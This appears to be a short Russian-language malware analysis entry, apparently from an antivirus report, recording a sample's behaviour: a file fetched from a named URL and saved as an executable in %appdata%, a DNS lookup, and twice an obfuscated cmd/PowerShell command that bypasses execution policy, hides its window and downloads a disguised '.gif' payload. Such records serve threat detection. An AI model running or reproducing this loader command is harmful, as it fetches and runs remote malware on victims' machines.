Техническая информация
- http://www.iemailpremium.com/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWeRsHeLl.exe -exeCutiOnPoLIcY BypAss -noPROFiLe -WInDOWsTyle HiDDeN (NEw-OBJECT SySteM.nEt.WebcLIent).DowNlOaDfIle('http://www.iemailpremium.com/read.php?f=1.gif','%APPdat...
- DNS ASK ie####premium.com
- '<SYSTEM32>\cmd.exe' /c "poWeRsHeLl.exe -exeCutiOnPoLIcY BypAss -noPROFiLe -WInDOWsTyle HiDDeN (NEw-OBJECT SySteM.nEt.WebcLIent).DowNlOaDfIle('http://www.iemailpremium.com/read.php?f=1.gif','%APPdat...' (со скрытым окном)